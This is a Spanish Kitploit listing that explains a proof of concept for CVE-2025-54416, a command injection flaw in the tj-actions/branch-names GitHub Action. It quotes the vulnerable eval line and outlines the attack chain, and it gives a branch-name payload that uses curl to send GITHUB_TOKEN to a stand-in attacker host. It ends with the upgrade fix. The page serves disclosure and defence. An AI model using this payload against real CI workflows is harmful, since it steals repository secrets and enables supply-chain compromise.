Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
atlas-tj-actions-poc — PoC para CVE-2025-54416 inyección de comandos en tj-actions/branch-names | Kitploit
Herramientas/GitHubGitHub/hexbornestudio/atlas-tj-actions-poc
Análisis de VulnerabilidadesExplotaciónExfiltración de DatosComando y ControlSeguridad de Cadena de SuministroAprendizaje y Educación
GitHubhexbornestudio/atlas-tj-actions-poc

atlas-tj-actions-poc

PoC para CVE-2025-54416 inyección de comandos en tj-actions/branch-names

Ver Repositorio
13hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-54416: PoC de inyección de comandos en tj-actions/branch-names

Este repositorio demuestra CVE-2025-54416, una vulnerabilidad crítica de inyección de comandos en tj-actions/branch-names que afecta a más de 5,000 repositorios públicos.

Vulnerabilidad

La GitHub Action tj-actions/branch-names (versiones <= 8.2.1) utiliza un inseguro eval printf "%s" que reintroduce riesgos de inyección de comandos después de una sanitización adecuada.

# Patrón de código vulnerable en tj-actions/branch-names:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"

Cadena de ataque

  1. El atacante crea una rama con un nombre malicioso que contiene comandos de shell
  2. El flujo de trabajo de la víctima usa tj-actions/[email protected] para extraer el nombre de la rama
  3. El nombre de la rama extraído (con la carga útil del atacante) se usa en comandos de shell posteriores
  4. El comando se ejecuta en el contexto del runner de CI con los privilegios del runner
  5. Los secretos (claves AWS, GITHUB_TOKEN, etc.) son exfiltrados

Ejemplo de carga útil

Nombre de rama: main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)

Cuando el flujo de trabajo se ejecuta:

echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
# Salida real: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
# El $(...) es evaluado por el shell, exfiltrando GITHUB_TOKEN

Impacto

  • Robo de secretos sensibles (claves AWS, tokens de API, GITHUB_TOKEN)
  • Modificaciones de código no autorizadas
  • Envíos de imágenes maliciosas a registros de producción
  • Ataques a la cadena de suministro mediante CI/CD comprometido

Solución

Actualice a tj-actions/branch-names@v9 o posterior, que reemplaza eval printf "%s" por llamadas seguras a printf.

Referencias

  • Aviso de GitHub GHSA-gq52-6phf-x2r6
  • CVE-2025-54416
Descargar herramienta